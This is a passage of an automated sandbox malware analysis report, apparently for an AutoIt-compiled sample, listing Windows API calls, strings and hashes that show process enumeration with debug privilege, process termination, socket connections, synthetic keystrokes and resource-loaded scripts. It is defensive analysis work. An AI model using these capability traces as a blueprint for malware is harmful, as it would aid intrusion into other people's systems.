                                                • Part of subcall function 00B87D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B87C62,80070057,?,?), ref: 00B87D6E
                                                • Part of subcall function 00B87D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B87C62,80070057,?), ref: 00B87D7E
                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00BA9EF0
                                              • _memset.LIBCMT ref: 00BA9EFD
                                              • _memset.LIBCMT ref: 00BAA040
                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00BAA06C
                                              • CoTaskMemFree.OLE32(?), ref: 00BAA077
                                              Strings
                                              • NULL Pointer assignment, xrefs: 00BAA0C5
                                              Similarity
                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                              • String ID: NULL Pointer assignment
                                              • API String ID: 1300414916-2785691316
                                              APIs
                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00BB7449
                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00BB745D
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BB7477
                                              • _wcscat.LIBCMT ref: 00BB74D2
                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00BB74E9
                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00BB7517
                                              Strings
                                              Similarity
                                              • API ID: MessageSend$Window_wcscat
                                              • String ID: SysListView32
                                              • API String ID: 307300125-78025650
                                              APIs
                                                • Part of subcall function 00B94148: CreateToolhelp32Snapshot.KERNEL32 ref: 00B9416D
                                                • Part of subcall function 00B94148: Process32FirstW.KERNEL32(00000000,?), ref: 00B9417B
                                                • Part of subcall function 00B94148: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00B94245
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BAF08D
                                              • GetLastError.KERNEL32 ref: 00BAF0A0
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BAF0CF
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BAF14C
                                              • GetLastError.KERNEL32(00000000), ref: 00BAF157
                                              • CloseHandle.KERNEL32(00000000), ref: 00BAF18C
                                              Strings
                                              Similarity
                                              • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 1701285019-2896544425
                                              APIs
                                              • LoadIconW.USER32(00000000,00007F03), ref: 00B9357C
                                              Strings
                                              Similarity
                                              • API ID: IconLoad
                                              • String ID: blank$info$question$stop$warning
                                              • API String ID: 2457776203-404129466
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B94802
                                              • LoadStringW.USER32(00000000), ref: 00B94809
                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B9481F
                                              • LoadStringW.USER32(00000000), ref: 00B94826
                                              • _wprintf.LIBCMT ref: 00B9484C
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B9486A
                                              Strings
                                              • %s (%d) : ==> %s: %s %s, xrefs: 00B94847
                                              Similarity
                                              • API ID: HandleLoadModuleString$Message_wprintf
                                              • String ID: %s (%d) : ==> %s: %s %s
                                              • API String ID: 3648134473-3128320259
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
                                              • GetSystemMetrics.USER32(0000000F), ref: 00BBDB42
                                              • GetSystemMetrics.USER32(0000000F), ref: 00BBDB62
                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00BBDD9D
                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00BBDDBB
                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00BBDDDC
                                              • ShowWindow.USER32(00000003,00000000), ref: 00BBDDFB
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00BBDE20
                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00BBDE43
                                              Similarity
                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                              • String ID:
                                              • API String ID: 1211466189-0
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00BB147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BB040D,?,?), ref: 00BB1491
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BB044E
                                              Similarity
                                              • API ID: BuffCharConnectRegistryUpper_memmove
                                              • String ID:
                                              • API String ID: 3479070676-0
                                              APIs
                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B6C508,00000004,00000000,00000000,00000000), ref: 00B32E9F
                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00B6C508,00000004,00000000,00000000,00000000,000000FF), ref: 00B32EE7
                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00B6C508,00000004,00000000,00000000,00000000), ref: 00B6C55B
                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B6C508,00000004,00000000,00000000,00000000), ref: 00B6C5C7
                                              Similarity
                                              • API ID: ShowWindow
                                              • String ID:
                                              • API String ID: 1268545403-0
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B97698
                                                • Part of subcall function 00B50FE6: std::exception::exception.LIBCMT ref: 00B5101C
                                                • Part of subcall function 00B50FE6: __CxxThrowException@8.LIBCMT ref: 00B51031
                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00B976CF
                                              • EnterCriticalSection.KERNEL32(?), ref: 00B976EB
                                              • _memmove.LIBCMT ref: 00B97739
                                              • _memmove.LIBCMT ref: 00B97756
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00B97765
                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00B9777A
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B97799
                                              Similarity
                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                              • String ID:
                                              • API String ID: 256516436-0
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 00BB6810
                                              • GetDC.USER32(00000000), ref: 00BB6818
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BB6823
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00BB682F
                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00BB686B
                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BB687C
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00BB964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00BB68B6
                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BB68D6
                                              Similarity
                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                              • String ID:
                                              • API String ID: 3864802216-0
                                              APIs
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              APIs
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                                • Part of subcall function 00B4436A: _wcscpy.LIBCMT ref: 00B4438D
                                              • _wcstok.LIBCMT ref: 00B9F2D7
                                              • _wcscpy.LIBCMT ref: 00B9F366
                                              • _memset.LIBCMT ref: 00B9F399
                                              Strings
                                              Similarity
                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                              • String ID: X
                                              • API String ID: 774024439-3081909835
                                              APIs
                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00BA72EB
                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00BA730C
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00BA731F
                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 00BA73D5
                                              • inet_ntoa.WSOCK32(?), ref: 00BA7392
                                                • Part of subcall function 00B8B4EA: _strlen.LIBCMT ref: 00B8B4F4
                                                • Part of subcall function 00B8B4EA: _memmove.LIBCMT ref: 00B8B516
                                              • _strlen.LIBCMT ref: 00BA742F
                                              • _memmove.LIBCMT ref: 00BA7498
                                              Similarity
                                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                              • String ID:
                                              • API String ID: 3619996494-0
                                              APIs
                                              • IsWindow.USER32(01945748), ref: 00BBBA5D
                                              • IsWindowEnabled.USER32(01945748), ref: 00BBBA69
                                              • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00BBBB4D
                                              • SendMessageW.USER32(01945748,000000B0,?,?), ref: 00BBBB84
                                              • IsDlgButtonChecked.USER32(?,?), ref: 00BBBBC1
                                              • GetWindowLongW.USER32(01945748,000000EC), ref: 00BBBBE3
                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00BBBBFB
                                              Similarity
                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                              • String ID:
                                              • API String ID: 4072528602-0
                                              APIs
                                              • _memset.LIBCMT ref: 00BAFB31
                                              • _memset.LIBCMT ref: 00BAFBFA
                                              • ShellExecuteExW.SHELL32(?), ref: 00BAFC3F
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                                • Part of subcall function 00B4436A: _wcscpy.LIBCMT ref: 00B4438D
                                              • GetProcessId.KERNEL32(00000000), ref: 00BAFCB6
                                              • CloseHandle.KERNEL32(00000000), ref: 00BAFCE5
                                              Strings
                                              Similarity
                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                              • String ID: @
                                              • API String ID: 3522835683-2766056989
                                              APIs
                                              • GetParent.USER32(?), ref: 00B9178B
                                              • GetKeyboardState.USER32(?), ref: 00B917A0
                                              • SetKeyboardState.USER32(?), ref: 00B91801
                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00B9182F
                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00B9184E
                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00B91894
                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B918B7
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              APIs
                                              • GetParent.USER32(00000000), ref: 00B915A4
                                              • GetKeyboardState.USER32(?), ref: 00B915B9
                                              • SetKeyboardState.USER32(?), ref: 00B9161A
                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B91646
                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B91663
                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B916A7
                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B916C8
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              APIs
                                              Similarity
                                              • API ID: _wcsncpy$LocalTime
                                              • String ID:
                                              • API String ID: 2945705084-0
                                              APIs
                                                • Part of subcall function 00B94BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B93B8A,?), ref: 00B94BE0
                                                • Part of subcall function 00B94BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B93B8A,?), ref: 00B94BF9
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00B93BAA
                                              • _wcscmp.LIBCMT ref: 00B93BC6
                                              • MoveFileW.KERNEL32(?,?), ref: 00B93BDE
                                              • _wcscat.LIBCMT ref: 00B93C26
                                              • SHFileOperationW.SHELL32(?), ref: 00B93C92
                                              Strings
                                              Similarity
                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                              • String ID: \*.*
                                              • API String ID: 1377345388-1173974218
                                              APIs
                                              • _memset.LIBCMT ref: 00BB78CF
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB7976
                                              • IsMenu.USER32(?), ref: 00BB798E
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BB79D6
                                              • DrawMenuBar.USER32 ref: 00BB79E9
                                              Strings
                                              Similarity
                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                              • String ID: 0
                                              • API String ID: 3866635326-4108050209
                                              APIs
                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00BB1631
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BB165B
                                              • FreeLibrary.KERNEL32(00000000), ref: 00BB1712
                                                • Part of subcall function 00BB1602: RegCloseKey.ADVAPI32(?), ref: 00BB1678
                                                • Part of subcall function 00BB1602: FreeLibrary.KERNEL32(?), ref: 00BB16CA
                                                • Part of subcall function 00BB1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00BB16ED
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00BB16B5
                                              Similarity
                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                              • String ID:
                                              • API String ID: 395352322-0
                                              APIs
                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00BB6911
                                              • GetWindowLongW.USER32(01945748,000000F0), ref: 00BB6944
                                              • GetWindowLongW.USER32(01945748,000000F0), ref: 00BB6979
                                              • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00BB69AB
                                              • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00BB69D5
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BB69E6
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BB6A00
                                              Similarity
                                              • API ID: LongWindow$MessageSend
                                              • String ID:
                                              • API String ID: 2178440468-0
                                              • Opcode ID: 7e16012bd695f81381ca9c1855729903e5bcd194ff70d4cda924b64a48c2c125
                                              • Instruction ID: a66ba6fa452f156765c68cca87fa98695ec751ccdf2d64bba8ed1134bfc0eb0f
                                              • Opcode Fuzzy Hash: 7e16012bd695f81381ca9c1855729903e5bcd194ff70d4cda924b64a48c2c125
                                              • Instruction Fuzzy Hash: 70311130648250AFDB21DF19DC88FA537E1EB4A794F1801E4F5948B2B2CBB6AC50DB50
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B8E2CA
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B8E2F0
                                              • SysAllocString.OLEAUT32(00000000), ref: 00B8E2F3
                                              • SysAllocString.OLEAUT32(?), ref: 00B8E311
                                              • SysFreeString.OLEAUT32(?), ref: 00B8E31A
                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00B8E33F
                                              • SysAllocString.OLEAUT32(?), ref: 00B8E34D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: 1b8853fb85590c26afbe2202884f5fd7f07b7482f83edc1f3241e1d33d8883a5
                                              • Instruction ID: effa06be031a4eeb44927761cbe8ed6531d8c6916f0e73878d838fea29bd1273
                                              • Opcode Fuzzy Hash: 1b8853fb85590c26afbe2202884f5fd7f07b7482f83edc1f3241e1d33d8883a5
                                              • Instruction Fuzzy Hash: 03218E76604219AF9B10EFA8DC88DBB77ECEB08360B448165FA24DB260DA70EC45C764
                                              APIs
                                                • Part of subcall function 00BA8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00BA84A0
                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00BA68B1
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00BA68C0
                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00BA68F9
                                              • connect.WSOCK32(00000000,?,00000010), ref: 00BA6902
                                              • WSAGetLastError.WSOCK32 ref: 00BA690C
                                              • closesocket.WSOCK32(00000000), ref: 00BA6935
                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00BA694E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                              • String ID:
                                              • API String ID: 910771015-0
                                              • Opcode ID: aa82ed58319a0693bac90fba17a6de33b982a88fe3f9c0554cd51cf20b4ed882
                                              • Instruction ID: 0712927b40005efb3e79705d367db580854ef9a7c7d4dd44461cfed1d3ef473f
                                              • Opcode Fuzzy Hash: aa82ed58319a0693bac90fba17a6de33b982a88fe3f9c0554cd51cf20b4ed882
                                              • Instruction Fuzzy Hash: C331B5B1604108AFDB10AF64CC85FBE77EDEB49725F0480A9FD05A7291CB74AC048BA1
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B8E3A5
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B8E3CB
                                              • SysAllocString.OLEAUT32(00000000), ref: 00B8E3CE
                                              • SysAllocString.OLEAUT32 ref: 00B8E3EF
                                              • SysFreeString.OLEAUT32 ref: 00B8E3F8
                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00B8E412
                                              • SysAllocString.OLEAUT32(?), ref: 00B8E420
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: 0716f10dc038c3b4a12237226f5cbf3552318eb24ec3600f5cdd49d5bf19826e
                                              • Instruction ID: f5079c1c00f0c9a452908c832c9d4c99b2a61ed619d9adace3d381b29a556564
                                              • Opcode Fuzzy Hash: 0716f10dc038c3b4a12237226f5cbf3552318eb24ec3600f5cdd49d5bf19826e
                                              • Instruction Fuzzy Hash: 53217435604205AFAB10BFA8DC88DAF77ECEB0D360B048565F919CB3A1DA70EC41CB64
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                              • API String ID: 1038674560-2734436370
                                              • Opcode ID: 6a15ccce5178f851ccccbeb535825ded75d2c7eda8bae5b02e7e0cf11a98f132
                                              • Instruction ID: c86dbf278f1c40c9f2db5035f0117285c5ecec72d619d6a53ef79e1ace746af2
                                              • Opcode Fuzzy Hash: 6a15ccce5178f851ccccbeb535825ded75d2c7eda8bae5b02e7e0cf11a98f132
                                              • Instruction Fuzzy Hash: 5E21643210015366C331BB249C02FBB73C8DF55B42F9044FAF886861B3EBA19E86C394
                                              APIs
                                                • Part of subcall function 00B32111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B3214F
                                                • Part of subcall function 00B32111: GetStockObject.GDI32(00000011), ref: 00B32163
                                                • Part of subcall function 00B32111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B3216D
                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BB7C57
                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BB7C64
                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BB7C6F
                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BB7C7E
                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BB7C8A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$CreateObjectStockWindow
                                              • String ID: Msctls_Progress32
                                              • API String ID: 1025951953-3636473452
                                              • Opcode ID: 90d6e5dc1170851f224ed6df8483d38f40d8466389d2c3f56e89c919e4550a4c
                                              • Instruction ID: d063fe6309d9b1176ddd12dd1afca09ab8b3a9ee3cbfb7ffff68f27dcf2c9c0f
                                              • Opcode Fuzzy Hash: 90d6e5dc1170851f224ed6df8483d38f40d8466389d2c3f56e89c919e4550a4c
                                              • Instruction Fuzzy Hash: 191190B2150219BFEF159F60CC85EE77F9DEF48798F014114BA08A20A0CB72AC21DBA0
                                              APIs
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B80817,?,?,00000000,00000000), ref: 00B99EE8
                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B80817,?,?,00000000,00000000), ref: 00B99EFF
                                              • LoadResource.KERNEL32(?,00000000,?,?,00B80817,?,?,00000000,00000000,?,?,?,?,?,?,00B44A14), ref: 00B99F0F
                                              • SizeofResource.KERNEL32(?,00000000,?,?,00B80817,?,?,00000000,00000000,?,?,?,?,?,?,00B44A14), ref: 00B99F20
                                              • LockResource.KERNEL32(00B80817,?,?,00B80817,?,?,00000000,00000000,?,?,?,?,?,?,00B44A14,00000000), ref: 00B99F2F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                              • String ID: SCRIPT
                                              • API String ID: 3051347437-3967369404
                                              • Opcode ID: ebc8393450db6f4687dc6be38d97188bb03543525ed9f3b25be4878f08505d4a
                                              • Instruction ID: b713b74656f632ca234ef8099e68a0a1aaca177669e2fa6386fdc90ab5557325
                                              • Opcode Fuzzy Hash: ebc8393450db6f4687dc6be38d97188bb03543525ed9f3b25be4878f08505d4a
                                              • Instruction Fuzzy Hash: 92112E71240701AFEB219B69DC48F27BBBDEBC9B11F1481ACB509DA260DB71EC04C661
                                              APIs
                                              • __init_pointers.LIBCMT ref: 00B59D16
                                                • Part of subcall function 00B533B7: EncodePointer.KERNEL32(00000000), ref: 00B533BA
                                                • Part of subcall function 00B533B7: __initp_misc_winsig.LIBCMT ref: 00B533D5
                                                • Part of subcall function 00B533B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B5A0D0
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B5A0E4
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B5A0F7
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B5A10A
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B5A11D
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00B5A130
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00B5A143
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00B5A156
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00B5A169
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00B5A17C
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00B5A18F
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00B5A1A2
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00B5A1B5
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00B5A1C8
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00B5A1DB
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00B5A1EE
                                              • __mtinitlocks.LIBCMT ref: 00B59D1B
                                              • __mtterm.LIBCMT ref: 00B59D24
                                                • Part of subcall function 00B59D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00B59D29,00B57EFD,00BECD38,00000014), ref: 00B59E86
                                                • Part of subcall function 00B59D8C: _free.LIBCMT ref: 00B59E8D
                                                • Part of subcall function 00B59D8C: DeleteCriticalSection.KERNEL32(00BF0C00,?,?,00B59D29,00B57EFD,00BECD38,00000014), ref: 00B59EAF
                                              • __calloc_crt.LIBCMT ref: 00B59D49
                                              • __initptd.LIBCMT ref: 00B59D6B
                                              • GetCurrentThreadId.KERNEL32 ref: 00B59D72
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
